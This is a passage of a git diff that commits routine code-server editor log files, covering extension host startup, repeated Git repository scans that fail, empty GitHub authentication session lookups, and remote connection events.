0000000..8523570 --- /dev/null +++ b/code-server-config/data/logs/20260120T175427/exthost6/remoteexthost.log @@ -0,0 +1,16 @@ +2026-01-22 13:38:40.013 [info] Extension host with pid 186729 started +2026-01-22 13:38:40.013 [error] Error: EEXIST: file already exists, open '/config/data/User/workspaceStorage/787b6db1/vscode.lock' +2026-01-22 13:38:40.014 [info] Lock '/config/data/User/workspaceStorage/787b6db1/vscode.lock': Could not acquire lock, checking if the file is stale. +2026-01-22 13:38:40.014 [info] Lock '/config/data/User/workspaceStorage/787b6db1/vscode.lock': The lock does not look stale, elapsed: 693 ms, giving up. +2026-01-22 13:38:40.020 [info] Lock '/config/data/User/workspaceStorage/787b6db1-1/vscode.lock': Lock acquired. +2026-01-22 13:38:40.122 [info] ExtensionService#_doActivateExtension vscode.github-authentication, startup: false, activationEvent: 'onAuthenticationRequest:github' +2026-01-22 13:38:40.123 [info] ExtensionService#_doActivateExtension vscode.emmet, startup: false, activationEvent: 'onLanguage' +2026-01-22 13:38:40.248 [info] ExtensionService#_doActivateExtension vscode.git-base, startup: true, activationEvent: '*', root cause: vscode.git +2026-01-22 13:38:40.288 [info] ExtensionService#_doActivateExtension vscode.git, startup: true, activationEvent: '*' +2026-01-22 13:38:40.289 [info] ExtensionService#_doActivateExtension vscode.github, startup: true, activationEvent: '*' +2026-01-22 13:38:40.442 [info] Eager extensions activated +2026-01-22 13:38:40.442 [info] ExtensionService#_doActivateExtension vscode.debug-auto-launch, startup: false, activationEvent: 'onStartupFinished' +2026-01-22 13:38:40.443 [info] ExtensionService#_doActivateExtension vscode.merge-conflict, startup: false, activationEvent: 'onStartupFinished' +2026-01-22 13:38:44.198 [info] Extension host terminating: received terminate message from renderer +2026-01-22 13:38:44.199 [info] Lock '/config/data/User/workspaceStorage/787b6db1-1/vscode.lock': Marking the lockfile as scheduled to be released in 6000 ms. +2026-01-22 13:38:44.216 [info] Extension host with pid 186729 exiting with code 0 diff --git a/code-server-config/data/logs/20260120T175427/exthost6/vscode.git/Git.log b/code-server-config/data/logs/20260120T175427/exthost6/vscode.git/Git.log new file mode 100755 index 0000000..abdbc04 --- /dev/null +++ b/code-server-config/data/logs/20260120T175427/exthost6/vscode.git/Git.log @@ -0,0 +1,35 @@ +2026-01-22 13:38:40.483 [info] [main] Log level: Info +2026-01-22 13:38:40.483 [info] [main] Validating found git in: "git" +2026-01-22 13:38:40.483 [info] [main] Using git "2.43.0" from "git" +2026-01-22 13:38:40.483 [info] [Model][doInitialScan] Initial repository scan started +2026-01-22 13:38:40.483 [info] > git rev-parse --show-toplevel [2ms] +2026-01-22 13:38:40.483 [info] fatal: not a git repository (or any parent up to mount point /home/coder) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-22 13:38:40.483 [info] > git rev-parse --show-toplevel [2ms] +2026-01-22 13:38:40.483 [info] fatal: not a git repository (or any parent up to mount point /home/coder) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-22 13:38:40.484 [info] > git rev-parse --show-toplevel [1ms] +2026-01-22 13:38:40.484 [info] fatal: not a git repository (or any parent up to mount point /home/coder) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-22 13:38:40.511 [info] > git rev-parse --show-toplevel [25ms] +2026-01-22 13:38:40.511 [info] fatal: not a git repository (or any parent up to mount point /home/coder) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-22 13:38:40.516 [info] > git rev-parse --show-toplevel [2ms] +2026-01-22 13:38:40.516 [info] fatal: not a git repository (or any parent up to mount point /home/coder) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-22 13:38:40.523 [info] > git rev-parse --show-toplevel [2ms] +2026-01-22 13:38:40.523 [info] fatal: not a git repository (or any parent up to mount point /home/coder) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-22 13:38:40.528 [info] > git rev-parse --show-toplevel [2ms] +2026-01-22 13:38:40.528 [info] fatal: not a git repository (or any parent up to mount point /home/coder) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-22 13:38:40.532 [info] > git rev-parse --show-toplevel [1ms] +2026-01-22 13:38:40.533 [info] fatal: not a git repository (or any parent up to mount point /home/coder) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-22 13:38:40.537 [info] > git rev-parse --show-toplevel [2ms] +2026-01-22 13:38:40.537 [info] fatal: not a git repository (or any parent up to mount point /home/coder) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-22 13:38:40.540 [info] [Model][doInitialScan] Initial repository scan completed - repositories (0), closed repositories (0), parent repositories (0), unsafe repositories (0) +2026-01-22 13:38:42.177 [info] > git rev-parse --show-toplevel [2ms] +2026-01-22 13:38:42.177 [info] fatal: not a git repository (or any parent up to mount point /home/coder) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). diff --git a/code-server-config/data/logs/20260120T175427/exthost6/vscode.github-authentication/GitHub Authentication.log b/code-server-config/data/logs/20260120T175427/exthost6/vscode.github-authentication/GitHub Authentication.log new file mode 100755 index 0000000..cf179ad --- /dev/null +++ b/code-server-config/data/logs/20260120T175427/exthost6/vscode.github-authentication/GitHub Authentication.log @@ -0,0 +1,33 @@ +2026-01-22 13:38:40.357 [info] Reading sessions from keychain... +2026-01-22 13:38:40.358 [info] Getting sessions for all scopes... +2026-01-22 13:38:40.358 [info] Got 0 sessions for ... +2026-01-22 13:38:40.358 [info] Getting sessions for all scopes... +2026-01-22 13:38:40.358 [info] Got 0 sessions for ... +2026-01-22 13:38:40.358 [info] Getting sessions for all scopes... +2026-01-22 13:38:40.358 [info] Got 0 sessions for ... +2026-01-22 13:38:40.358 [info] Getting sessions for all scopes... +2026-01-22 13:38:40.358 [info] Got 0 sessions for ... +2026-01-22 13:38:40.358 [info] Getting sessions for all scopes... +2026-01-22 13:38:40.358 [info] Got 0 sessions for ... +2026-01-22 13:38:40.358 [info] Getting sessions for all scopes... +2026-01-22 13:38:40.358 [info] Got 0 sessions for ... +2026-01-22 13:38:40.358 [info] Getting sessions for all scopes... +2026-01-22 13:38:40.358 [info] Got 0 sessions for ... +2026-01-22 13:38:40.358 [info] Getting sessions for all scopes... +2026-01-22 13:38:40.358 [info] Got 0 sessions for ... +2026-01-22 13:38:40.358 [info] Getting sessions for all scopes... +2026-01-22 13:38:40.358 [info] Got 0 sessions for ... +2026-01-22 13:38:40.366 [info] Getting sessions for all scopes... +2026-01-22 13:38:40.366 [info] Got 0 sessions for ... +2026-01-22 13:38:40.395 [info] Getting sessions for all scopes... +2026-01-22 13:38:40.396 [info] Got 0 sessions for ... +2026-01-22 13:38:40.396 [info] Getting sessions for all scopes... +2026-01-22 13:38:40.396 [info] Got 0 sessions for ... +2026-01-22 13:38:40.396 [info] Getting sessions for all scopes... +2026-01-22 13:38:40.396 [info] Got 0 sessions for ... +2026-01-22 13:38:40.396 [info] Getting sessions for all scopes... +2026-01-22 13:38:40.396 [info] Got 0 sessions for ... +2026-01-22 13:38:40.396 [info] Getting sessions for all scopes... +2026-01-22 13:38:40.396 [info] Got 0 sessions for ... +2026-01-22 13:38:42.245 [info] Getting sessions for all scopes... +2026-01-22 13:38:42.245 [info] Got 0 sessions for ... diff --git a/code-server-config/data/logs/20260120T175427/exthost6/vscode.github/GitHub.log b/code-server-config/data/logs/20260120T175427/exthost6/vscode.github/GitHub.log new file mode 100755 index 0000000..ff38ada --- /dev/null +++ b/code-server-config/data/logs/20260120T175427/exthost6/vscode.github/GitHub.log @@ -0,0 +1 @@ +2026-01-22 13:38:40.523 [info] Log level: Info diff --git a/code-server-config/data/logs/20260120T175427/exthost7/remoteExtHostTelemetry.log b/code-server-config/data/logs/20260120T175427/exthost7/remoteExtHostTelemetry.log new file mode 100755 index 0000000..e69de29 diff --git a/code-server-config/data/logs/20260120T175427/exthost7/remoteexthost.log b/code-server-config/data/logs/20260120T175427/exthost7/remoteexthost.log new file mode 100755 index 0000000..bc8b52b --- /dev/null +++ b/code-server-config/data/logs/20260120T175427/exthost7/remoteexthost.log @@ -0,0 +1,12 @@ +2026-01-22 19:12:28.063 [info] Extension host with pid 196294 started +2026-01-22 19:12:28.071 [info] Lock '/config/data/User/workspaceStorage/-54297bf2/vscode.lock': Lock acquired. +2026-01-22 19:12:28.227 [info] ExtensionService#_doActivateExtension vscode.github-authentication, startup: false, activationEvent: 'onAuthenticationRequest:github' +2026-01-22 19:12:28.228 [info] ExtensionService#_doActivateExtension vscode.emmet, startup: false, activationEvent: 'onLanguage' +2026-01-22 19:12:28.358 [info] ExtensionService#_doActivateExtension vscode.git-base, startup: true, activationEvent: '*', root cause: vscode.git +2026-01-22 19:12:28.383 [info] ExtensionService#_doActivateExtension vscode.git, startup: true, activationEvent: '*' +2026-01-22 19:12:28.383 [info] ExtensionService#_doActivateExtension vscode.github, startup: true, activationEvent: '*' +2026-01-22 19:12:28.568 [info] Eager extensions activated +2026-01-22 19:12:28.568 [info] ExtensionService#_doActivateExtension vscode.debug-auto-launch, startup: false, activationEvent: 'onStartupFinished' +2026-01-22 19:12:28.569 [info] ExtensionService#_doActivateExtension vscode.merge-conflict, startup: false, activationEvent: 'onStartupFinished' +2026-01-22 19:12:29.303 [info] ExtensionService#_doActivateExtension vscode.terminal-suggest, startup: false, activationEvent: 'onTerminalShellIntegration:*' +2026-01-22 19:12:30.711 [info] ExtensionService#_doActivateExtension vscode.tunnel-forwarding, startup: false, activationEvent: 'onTunnel' diff --git a/code-server-config/data/logs/20260120T175427/exthost7/vscode.git/Git.log b/code-server-config/data/logs/20260120T175427/exthost7/vscode.git/Git.log new file mode 100755 index 0000000..545007c --- /dev/null +++ b/code-server-config/data/logs/20260120T175427/exthost7/vscode.git/Git.log @@ -0,0 +1,107 @@ +2026-01-22 19:12:28.648 [info] [main] Log level: Info +2026-01-22 19:12:28.648 [info] [main] Validating found git in: "git" +2026-01-22 19:12:28.648 [info] [main] Using git "2.43.0" from "git" +2026-01-22 19:12:28.648 [info] [Model][doInitialScan] Initial repository scan started +2026-01-22 19:12:28.648 [info] > git rev-parse --show-toplevel [2ms] +2026-01-22 19:12:28.648 [info] fatal: not a git repository (or any parent up to mount point /home/coder) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-22 19:12:28.648 [info] > git rev-parse --show-toplevel [2ms] +2026-01-22 19:12:28.648 [info] fatal: not a git repository (or any parent up to mount point /home/coder) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-22 19:12:28.648 [info] > git rev-parse --show-toplevel [7ms] +2026-01-22 19:12:28.648 [info] fatal: not a git repository (or any parent up to mount point /home/coder) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-22 19:12:28.648 [info] > git rev-parse --show-toplevel [2ms] +2026-01-22 19:12:28.648 [info] fatal: not a git repository (or any parent up to mount point /home/coder) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-22 19:12:28.648 [info] > git rev-parse --show-toplevel [2ms] +2026-01-22 19:12:28.648 [info] fatal: not a git repository (or any parent up to mount point /home/coder) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-22 19:12:28.649 [info] > git rev-parse --show-toplevel [24ms] +2026-01-22 19:12:28.649 [info] fatal: not a git repository (or any parent up to mount point /home/coder) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-22 19:12:28.655 [info] > git rev-parse --show-toplevel [3ms] +2026-01-22 19:12:28.655 [info] fatal: not a git repository (or any parent up to mount point /home/coder) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-22 19:12:28.659 [info] > git rev-parse --show-toplevel [1ms] +2026-01-22 19:12:28.660 [info] fatal: not a git repository (or any parent up to mount point /home/coder) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-22 19:12:28.664 [info] > git rev-parse --show-toplevel [2ms] +2026-01-22 19:12:28.664 [info] fatal: not a git repository (or any parent up to mount point /home/coder) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-22 19:12:28.668 [info] [Model][doInitialScan] Initial repository scan completed - repositories (0), closed repositories (0), parent repositories (0), unsafe repositories (0) +2026-01-22 19:12:28.672 [info] > git rev-parse --show-toplevel [2ms] +2026-01-22 19:12:28.672 [info] fatal: not a git repository (or any parent up to mount point /home/coder) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-22 19:12:28.983 [info] > git rev-parse --show-toplevel [1ms] +2026-01-22 19:12:28.983 [info] fatal: not a git repository (or any parent up to mount point /home/coder) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-22 19:12:28.986 [info] > git rev-parse --show-toplevel [1ms] +2026-01-22 19:12:28.986 [info] fatal: not a git repository (or any parent up to mount point /home/coder) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-22 19:12:29.418 [info] > git rev-parse --show-toplevel [1ms] +2026-01-22 19:12:29.418 [info] fatal: not a git repository (or any parent up to mount point /home/coder) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-22 19:12:29.453 [info] > git rev-parse --show-toplevel [4ms] +2026-01-22 19:12:29.453 [info] fatal: not a git repository (or any parent up to mount point /home/coder) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-22 19:12:30.609 [info] > git rev-parse --show-toplevel [4ms] +2026-01-22 19:12:30.609 [info] fatal: not a git repository (or any parent up to mount point /home/coder) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-22 19:24:07.369 [info] > git rev-parse --show-toplevel [2ms] +2026-01-22 19:24:07.369 [info] fatal: not a git repository (or any parent up to mount point /home/coder) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-22 19:31:31.422 [info] > git rev-parse --show-toplevel [3ms] +2026-01-22 19:31:31.422 [info] fatal: not a git repository (or any parent up to mount point /home/coder) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-22 19:32:43.247 [info] > git rev-parse --show-toplevel [1ms] +2026-01-22 19:32:43.247 [info] fatal: not a git repository (or any parent up to mount point /home/coder) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-22 19:48:20.668 [info] > git rev-parse --show-toplevel [2ms] +2026-01-22 19:48:20.668 [info] fatal: not a git repository (or any parent up to mount point /home/coder) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-22 19:48:21.268 [info] > git rev-parse --show-toplevel [2ms] +2026-01-22 19:48:21.268 [info] fatal: not a git repository (or any parent up to mount point /home/coder) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-22 19:51:07.517 [info] > git rev-parse --show-toplevel [1ms] +2026-01-22 19:51:07.517 [info] fatal: not a git repository (or any parent up to mount point /home/coder) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-22 19:54:08.947 [info] > git rev-parse --show-toplevel [1ms] +2026-01-22 19:54:08.947 [info] fatal: not a git repository (or any parent up to mount point /home/coder) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-22 19:57:41.710 [info] > git rev-parse --show-toplevel [1ms] +2026-01-22 19:57:41.710 [info] fatal: not a git repository (or any parent up to mount point /home/coder) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-22 20:02:52.025 [info] > git rev-parse --show-toplevel [1ms] +2026-01-22 20:02:52.025 [info] fatal: not a git repository (or any parent up to mount point /home/coder) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-22 20:02:52.653 [info] > git rev-parse --show-toplevel [1ms] +2026-01-22 20:02:52.653 [info] fatal: not a git repository (or any parent up to mount point /home/coder) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-22 21:42:32.330 [info] > git rev-parse --show-toplevel [2ms] +2026-01-22 21:42:32.330 [info] fatal: not a git repository (or any parent up to mount point /home/coder) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-22 21:45:07.922 [info] > git rev-parse --show-toplevel [1ms] +2026-01-22 21:45:07.923 [info] fatal: not a git repository (or any parent up to mount point /home/coder) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-22 21:45:32.668 [info] > git rev-parse --show-toplevel [2ms] +2026-01-22 21:45:32.668 [info] fatal: not a git repository (or any parent up to mount point /home/coder) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-22 21:51:30.338 [info] > git rev-parse --show-toplevel [1ms] +2026-01-22 21:51:30.338 [info] fatal: not a git repository (or any parent up to mount point /home/coder) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-22 21:51:30.933 [info] > git rev-parse --show-toplevel [2ms] +2026-01-22 21:51:30.933 [info] fatal: not a git repository (or any parent up to mount point /home/coder) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-22 21:53:31.546 [info] > git rev-parse --show-toplevel [1ms] +2026-01-22 21:53:31.546 [info] fatal: not a git repository (or any parent up to mount point /home/coder) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-22 21:56:04.969 [info] > git rev-parse --show-toplevel [1ms] +2026-01-22 21:56:04.969 [info] fatal: not a git repository (or any parent up to mount point /home/coder) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-22 21:57:22.897 [info] > git rev-parse --show-toplevel [1ms] +2026-01-22 21:57:22.898 [info] fatal: not a git repository (or any parent up to mount point /home/coder) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-22 22:06:26.301 [info] > git rev-parse --show-toplevel [1ms] +2026-01-22 22:06:26.301 [info] fatal: not a git repository (or any parent up to mount point /home/coder) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). diff --git a/code-server-config/data/logs/20260120T175427/exthost7/vscode.github-authentication/GitHub Authentication.log b/code-server-config/data/logs/20260120T175427/exthost7/vscode.github-authentication/GitHub Authentication.log new file mode 100755 index 0000000..874e87b --- /dev/null +++ b/code-server-config/data/logs/20260120T175427/exthost7/vscode.github-authentication/GitHub Authentication.log @@ -0,0 +1,33 @@ +2026-01-22 19:12:28.446 [info] Reading sessions from keychain... +2026-01-22 19:12:28.446 [info] Getting sessions for all scopes... +2026-01-22 19:12:28.446 [info] Got 0 sessions for ... +2026-01-22 19:12:28.446 [info] Getting sessions for all scopes... +2026-01-22 19:12:28.446 [info] Got 0 sessions for ... +2026-01-22 19:12:28.446 [info] Getting sessions for all scopes... +2026-01-22 19:12:28.446 [info] Got 0 sessions for ... +2026-01-22 19:12:28.446 [info] Getting sessions for all scopes... +2026-01-22 19:12:28.446 [info] Got 0 sessions for ... +2026-01-22 19:12:28.446 [info] Getting sessions for all scopes... +2026-01-22 19:12:28.446 [info] Got 0 sessions for ... +2026-01-22 19:12:28.446 [info] Getting sessions for all scopes... +2026-01-22 19:12:28.446 [info] Got 0 sessions for ... +2026-01-22 19:12:28.446 [info] Getting sessions for all scopes... +2026-01-22 19:12:28.446 [info] Got 0 sessions for ... +2026-01-22 19:12:28.446 [info] Getting sessions for all scopes... +2026-01-22 19:12:28.446 [info] Got 0 sessions for ... +2026-01-22 19:12:28.500 [info] Getting sessions for all scopes... +2026-01-22 19:12:28.500 [info] Got 0 sessions for ... +2026-01-22 19:12:28.547 [info] Getting sessions for all scopes... +2026-01-22 19:12:28.547 [info] Got 0 sessions for ... +2026-01-22 19:12:28.548 [info] Getting sessions for all scopes... +2026-01-22 19:12:28.548 [info] Got 0 sessions for ... +2026-01-22 19:12:28.548 [info] Getting sessions for all scopes... +2026-01-22 19:12:28.548 [info] Got 0 sessions for ... +2026-01-22 19:12:28.548 [info] Getting sessions for all scopes... +2026-01-22 19:12:28.548 [info] Got 0 sessions for ... +2026-01-22 19:12:28.548 [info] Getting sessions for all scopes... +2026-01-22 19:12:28.548 [info] Got 0 sessions for ... +2026-01-22 19:12:28.598 [info] Getting sessions for all scopes... +2026-01-22 19:12:28.598 [info] Got 0 sessions for ... +2026-01-22 19:12:30.714 [info] Getting sessions for all scopes... +2026-01-22 19:12:30.714 [info] Got 0 sessions for ... diff --git a/code-server-config/data/logs/20260120T175427/exthost7/vscode.github/GitHub.log b/code-server-config/data/logs/20260120T175427/exthost7/vscode.github/GitHub.log new file mode 100755 index 0000000..3310667 --- /dev/null +++ b/code-server-config/data/logs/20260120T175427/exthost7/vscode.github/GitHub.log @@ -0,0 +1 @@ +2026-01-22 19:12:28.648 [info] Log level: Info diff --git a/code-server-config/data/logs/20260120T175427/ptyhost.log b/code-server-config/data/logs/20260120T175427/ptyhost.log new file mode 100755 index 0000000..dd1ccf2 --- /dev/null +++ b/code-server-config/data/logs/20260120T175427/ptyhost.log @@ -0,0 +1,22 @@ +2026-01-20 18:02:49.764 [info] Expanding terminal instance, old id -54297bf2-4 -> new id undefined +2026-01-20 18:02:53.955 [warning] Persistent process "4": Process had no disconnect runners but was an orphan +2026-01-20 18:02:53.955 [info] Persistent process reconnection "4" +2026-01-20 18:02:53.997 [info] Persistent process "4": Replaying 46 chars and 1 size events +2026-01-21 19:20:38.480 [info] Expanding terminal instance, old id -54297bf2-4 -> new id undefined +2026-01-21 19:20:38.481 [info] Expanding terminal instance, old id -54297bf2-5 -> new id undefined +2026-01-21 19:20:43.529 [warning] Persistent process "4": Process had no disconnect runners but was an orphan +2026-01-21 19:20:43.529 [info] Persistent process reconnection "4" +2026-01-21 19:20:43.530 [warning] Persistent process "5": Process had no disconnect runners but was an orphan +2026-01-21 19:20:43.530 [info] Persistent process reconnection "5" +2026-01-21 19:20:43.562 [info] Persistent process "4": Replaying 7496 chars and 1 size events +2026-01-21 19:20:43.567 [info] Persistent process "5": Replaying 713 chars and 1 size events +2026-01-22 13:38:40.173 [info] Expanding terminal instance, old id 787b6db1-6 -> new id undefined +2026-01-22 13:38:40.173 [info] Expanding terminal instance, old id 787b6db1-7 -> new id undefined +2026-01-22 19:12:28.804 [info] Expanding terminal instance, old id -54297bf2-4 -> new id undefined +2026-01-22 19:12:28.804 [info] Expanding terminal instance, old id -54297bf2-5 -> new id undefined +2026-01-22 19:12:29.204 [warning] Persistent process "5": Process had no disconnect runners but was an orphan +2026-01-22 19:12:29.204 [info] Persistent process reconnection "5" +2026-01-22 19:12:29.204 [warning] Persistent process "4": Process had no disconnect runners but was an orphan +2026-01-22 19:12:29.204 [info] Persistent process reconnection "4" +2026-01-22 19:12:29.214 [info] Persistent process "5": Replaying 713 chars and 1 size events +2026-01-22 19:12:29.223 [info] Persistent process "4": Replaying 6984 chars and 1 size events diff --git a/code-server-config/data/logs/20260120T175427/remoteagent.log b/code-server-config/data/logs/20260120T175427/remoteagent.log new file mode 100755 index 0000000..14ccf1c --- /dev/null +++ b/code-server-config/data/logs/20260120T175427/remoteagent.log @@ -0,0 +1,77 @@ +2026-01-20 17:54:27.590 [info] + + + + +2026-01-20 17:54:27.604 [info] Extension host agent started. +2026-01-20 17:54:27.637 [error] [192.168.100.179][fa712925][ManagementConnection] Unknown reconnection token (never seen). +2026-01-20 17:54:27.764 [error] [192.168.100.179][5d2090d7][ExtensionHostConnection] Unknown reconnection token (never seen). +2026-01-20 17:55:29.877 [info] [192.168.100.179][4dc6adfb][ManagementConnection] New connection established. +2026-01-20 17:55:30.543 [info] [192.168.100.179][0c30ab81][ExtensionHostConnection] New connection established. +2026-01-20 17:55:30.591 [info] [192.168.100.179][0c30ab81][ExtensionHostConnection] <728> Launched Extension Host Process. +2026-01-20 17:55:30.840 [info] [192.168.100.179][0c30ab81][ExtensionHostConnection] <728> [reconnection-grace-time] Extension host: read VSCODE_RECONNECTION_GRACE_TIME=10800000ms (10800s) + +2026-01-20 18:02:47.233 [info] [192.168.100.179][4dc6adfb][ManagementConnection] The client has disconnected gracefully, so the connection will be disposed. +2026-01-20 18:02:47.329 [info] [192.168.100.179][0c30ab81][ExtensionHostConnection] <728> Extension Host Process exited with code: 0, signal: null. +2026-01-20 18:02:48.431 [info] [192.168.100.179][105d17e6][ManagementConnection] New connection established. +2026-01-20 18:02:49.035 [info] [192.168.100.179][3b80c047][ExtensionHostConnection] New connection established. +2026-01-20 18:02:49.038 [info] [192.168.100.179][3b80c047][ExtensionHostConnection] <2941> Launched Extension Host Process. +2026-01-20 18:02:49.293 [info] [192.168.100.179][3b80c047][ExtensionHostConnection] <2941> [reconnection-grace-time] Extension host: read VSCODE_RECONNECTION_GRACE_TIME=10800000ms (10800s) + +2026-01-21 01:22:42.458 [info] [192.168.100.179][105d17e6][ManagementConnection] The client has disconnected gracefully, so the connection will be disposed. +2026-01-21 01:22:42.572 [info] [192.168.100.179][3b80c047][ExtensionHostConnection] <2941> Extension Host Process exited with code: 0, signal: null. +2026-01-21 12:17:14.478 [info] [172.21.0.6][94bb0b0e][ManagementConnection] New connection established. +2026-01-21 12:17:15.179 [info] [172.21.0.6][e7d111f3][ExtensionHostConnection] New connection established. +2026-01-21 12:17:15.184 [info] [172.21.0.6][e7d111f3][ExtensionHostConnection] <86155> Launched Extension Host Process. +2026-01-21 12:17:15.432 [info] [172.21.0.6][e7d111f3][ExtensionHostConnection] <86155> [reconnection-grace-time] Extension host: read VSCODE_RECONNECTION_GRACE_TIME=10800000ms (10800s) + +2026-01-21 12:46:17.676 [info] [172.21.0.6][94bb0b0e][ManagementConnection] The client has disconnected gracefully, so the connection will be disposed. +2026-01-21 12:46:17.743 [info] [172.21.0.6][e7d111f3][ExtensionHostConnection] <86155> Extension Host Process exited with code: 0, signal: null. +2026-01-21 19:20:36.973 [info] [192.168.100.179][0fb200da][ManagementConnection] New connection established. +2026-01-21 19:20:37.542 [info] [192.168.100.179][b301e1c6][ExtensionHostConnection] New connection established. +2026-01-21 19:20:37.546 [info] [192.168.100.179][b301e1c6][ExtensionHostConnection] <91748> Launched Extension Host Process. +2026-01-21 19:20:37.794 [info] [192.168.100.179][b301e1c6][ExtensionHostConnection] <91748> [reconnection-grace-time] Extension host: read VSCODE_RECONNECTION_GRACE_TIME=10800000ms (10800s) + +2026-01-22 02:15:22.082 [info] [192.168.100.179][0fb200da][ManagementConnection] The client has disconnected gracefully, so the connection will be disposed. +2026-01-22 02:15:22.223 [info] [192.168.100.179][b301e1c6][ExtensionHostConnection] <91748> Extension Host Process exited with code: 0, signal: null. +2026-01-22 11:53:42.746 [info] [172.21.0.6][a6ac9c9e][ManagementConnection] New connection established. +2026-01-22 11:53:43.440 [info] [172.21.0.6][eef52a31][ExtensionHostConnection] New connection established. +2026-01-22 11:53:43.453 [info] [172.21.0.6][eef52a31][ExtensionHostConnection] <165828> Launched Extension Host Process. +2026-01-22 11:53:43.700 [info] [172.21.0.6][eef52a31][ExtensionHostConnection] <165828> [reconnection-grace-time] Extension host: read VSCODE_RECONNECTION_GRACE_TIME=10800000ms (10800s) + +2026-01-22 13:38:38.922 [info] [172.21.0.6][7cd32c3d][ManagementConnection] New connection established. +2026-01-22 13:38:39.565 [info] [172.21.0.6][2358951f][ExtensionHostConnection] New connection established. +2026-01-22 13:38:39.573 [info] [172.21.0.6][2358951f][ExtensionHostConnection] <186729> Launched Extension Host Process. +2026-01-22 13:38:39.826 [info] [172.21.0.6][2358951f][ExtensionHostConnection] <186729> [reconnection-grace-time] Extension host: read VSCODE_RECONNECTION_GRACE_TIME=10800000ms (10800s) + +2026-01-22 13:38:44.162 [info] [172.21.0.6][7cd32c3d][ManagementConnection] The client has disconnected gracefully, so the connection will be disposed. +2026-01-22 13:38:44.229 [info] [172.21.0.6][2358951f][ExtensionHostConnection] <186729> Extension Host Process exited with code: 0, signal: null. +2026-01-22 13:38:57.143 [warning] RequestStore#acceptReply was called without receiving a matching request 177 +2026-01-22 13:38:57.144 [warning] RequestStore#acceptReply was called without receiving a matching request 178 +2026-01-22 13:38:57.144 [warning] RequestStore#acceptReply was called without receiving a matching request 179 +2026-01-22 13:38:57.144 [warning] RequestStore#acceptReply was called without receiving a matching request 180 +2026-01-22 13:38:57.144 [warning] RequestStore#acceptReply was called without receiving a matching request 181 +2026-01-22 13:38:57.145 [warning] RequestStore#acceptReply was called without receiving a matching request 182 +2026-01-22 13:38:57.145 [warning] RequestStore#acceptReply was called without receiving a matching request 183 +2026-01-22 13:38:57.145 [warning] RequestStore#acceptReply was called without receiving a matching request 184 +2026-01-22 13:38:57.145 [warning] RequestStore#acceptReply was called without receiving a matching request 185 +2026-01-22 13:38:57.146 [warning] RequestStore#acceptReply was called without receiving a matching request 186 +2026-01-22 13:38:57.146 [warning] RequestStore#acceptReply was called without receiving a matching request 187 +2026-01-22 13:38:57.146 [warning] RequestStore#acceptReply was called without receiving a matching request 188 +2026-01-22 